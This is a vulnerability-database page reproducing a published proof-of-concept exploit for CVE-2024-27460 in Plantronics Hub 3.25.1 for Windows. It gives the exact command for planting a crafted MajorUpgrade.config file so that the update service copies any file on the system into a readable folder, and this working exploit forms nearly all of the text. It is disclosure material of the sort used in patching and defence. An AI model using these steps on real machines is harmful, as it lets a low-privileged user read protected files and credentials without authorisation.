Lucene search
Alaa Kachouh, Farid ZerroukPACKETSTORM:178563HistoryMay 14, 2024 - 12:00 a.m.
Plantronics Hub 3.25.1 Arbitrary File Read
2024-05-1400:00:00
Alaa Kachouh, Farid Zerrouk
packetstormsecurity.com
132
plantronics hub
arbitrary file read
cve-2024-27460
windows 10/11
exploit
vendor homepage
poc
deloitte belgium
mastercard
file copy
security advisory
plantronics spokes3g
`# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
Mastercard
# Vendor Homepage:
https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460
As a regular user drop a file called "MajorUpgrade.config" inside the
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
MajorUpgrade.config should look like the following one liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
(any file on the system). The desired file will be copied into C:\Program
Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:\Program Files
(x86)\Plantronics\Spokes3G\UpdateServiceTemp
`
Related
nvd
nvd
CVE-2024-27460
2024-05-14 15:12:33
cve
cve
CVE-2024-27460
2024-05-14 15:12:33
githubexploit
githubexploit
Exploit for CVE-2024-27460
2024-05-12 09:53:07
cvelist
cvelist
CVE-2024-27460
2024-05-10 20:23:40
zdt
zdt
Plantronics Hub 3.25.1 - Arbitrary File Read Vulnerability
2024-05-13 00:00:00
exploitdb
exploitdb
Plantronics Hub 3.25.1 - Arbitrary File Read
2024-05-13 00:00:00
hp
hp
Plantronics Hub – Local Privilege Escalation
2023-12-20 00:00:00